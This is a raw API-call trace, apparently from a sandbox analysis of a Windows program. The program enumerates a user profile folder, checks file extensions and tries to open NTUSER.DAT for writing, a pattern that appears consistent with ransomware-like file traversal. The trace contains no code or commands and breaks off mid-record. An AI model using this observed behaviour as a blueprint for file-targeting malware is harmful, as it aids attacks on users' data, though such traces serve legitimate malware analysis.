[0179.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.979] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf2ab6db0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2ab6db0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0179.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.979] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0179.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c40050 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f318 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3f0 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d306d0 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30718 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30760 [0179.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307a8 [0179.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f480 | out: hHeap=0x6a0000) returned 1 [0179.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0179.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0179.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd950 | out: hHeap=0x6a0000) returned 1 [0179.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dd8c0 | out: hHeap=0x6a0000) returned 1 [0179.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30688 | out: hHeap=0x6a0000) returned 1 [0179.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0179.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0179.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0179.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0179.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.984] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98b65310, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98b65310, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0179.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0179.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.984] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0179.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6fec8 [0179.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0179.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fec8 | out: hHeap=0x6a0000) returned 1 [0179.986] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0179.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0179.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.986] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x791af7b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa9fca580, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xa9fca580, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0179.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x46) returned 0x2c76980 [0179.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.987] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT") returned=".DAT" [0179.987] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\NTUSER.DAT" (normalized: "c:\\users\\keecfmwgj\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0179.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c76980 | out: hHeap=0x6a0000) returned 1 [0179.988] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xa9f32000, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0179.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.988] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.dat.LOG1") returned=".LOG1" [0179.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.989] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79bf3690, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0179.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.989] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.dat.LOG2") returned=".LOG2" [0179.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0179.990] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79bf3690, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79bf3690, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0179.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x711c18 [0179.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.990] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0179.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x711c18 | out: hHeap=0x6a0000) returned 1 [0179.991] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c197f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c197f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0179.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x2c70bc8 [0179.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.991] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0179.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0179.992] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x79c3f950, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79c3f950, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x9151ca20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0179.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x2c70bc8 [0179.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.992] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0179.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0179.993] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x7945d070, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7945d070, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0179.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0179.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x46) returned 0x2c76980 [0179.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0179.993] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\ntuser.ini") returned=".ini" [0179.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c76980 | out: hHeap=0x6a0000) returned 1 [0179.993] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0179.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x214) returned 0x2d2fc98 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f480 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30688 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d307f0 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30838 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30880 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d308c8 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30910 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30958 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309a0 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82cc8 [0179.994] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309e8 [0179.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f318 | out: hHeap=0x6a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3f0 | out: hHeap=0x6a0000) returned 1 [0179.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d306d0 | out: hHeap=0x6a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30718 | out: hHeap=0x6a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30760 | out: hHeap=0x6a0000) returned 1 [0179.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d307a8 | out: hHeap=0x6a0000) returned 1 [0179.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0179.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0179.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0179.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0179.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c40050 | out: hHeap=0x6a0000) returned 1 [0179.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0179.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.998] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98f436d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98f436d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0179.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.998] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0179.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0179.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0179.999] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0179.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0179.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0179.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0179.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0180.000] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8847c0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0180.000] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, 